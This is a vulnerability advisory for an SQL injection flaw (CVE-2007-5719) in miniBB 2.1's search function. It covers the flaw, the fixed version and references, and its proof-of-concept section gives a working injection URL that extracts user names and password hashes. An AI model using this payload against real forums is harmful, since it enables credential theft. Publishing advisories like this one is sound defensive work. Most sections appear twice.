miniBB BB_FUNC_SEARCH.PHP SQL Injection Vulnerability
BID:26249
Info
miniBB BB_FUNC_SEARCH.PHP SQL Injection Vulnerability
| Bugtraq ID: | 26249 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5719 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 30 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | irk4z discovered this vulnerability. |
| Vulnerable: |
MiniBB MiniBB 2.1 |
| Not Vulnerable: |
MiniBB MiniBB 2.1a |
Discussion
miniBB BB_FUNC_SEARCH.PHP SQL Injection Vulnerability
miniBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects miniBB 2.1; other versions may also be vulnerable.
miniBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects miniBB 2.1; other versions may also be vulnerable.
Exploit / POC
miniBB BB_FUNC_SEARCH.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?action=search&where=3&searchGo=1&table=[SQL]
http://www.example.com/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username,0x20,user_password))/**/FROM/**/minibbtable_users/**/WHERE/**/user_id=1/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?action=search&where=3&searchGo=1&table=[SQL]
http://www.example.com/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username,0x20,user_password))/**/FROM/**/minibbtable_users/**/WHERE/**/user_id=1/*
Solution / Fix
miniBB BB_FUNC_SEARCH.PHP SQL Injection Vulnerability
Solution:
The vendor has released MiniBB 2.1a to address this issue. Please see the references for more information.
MiniBB MiniBB 2.1
Solution:
The vendor has released MiniBB 2.1a to address this issue. Please see the references for more information.
MiniBB MiniBB 2.1
-
MiniBB miniBB 2.1a
http://www.minibb.net/download.php?file=minibb21
References
miniBB BB_FUNC_SEARCH.PHP SQL Injection Vulnerability
References:
References:
- MiniBB Homepage (MiniBB)
- miniBB version 2.1a released - security fix (MiniBB)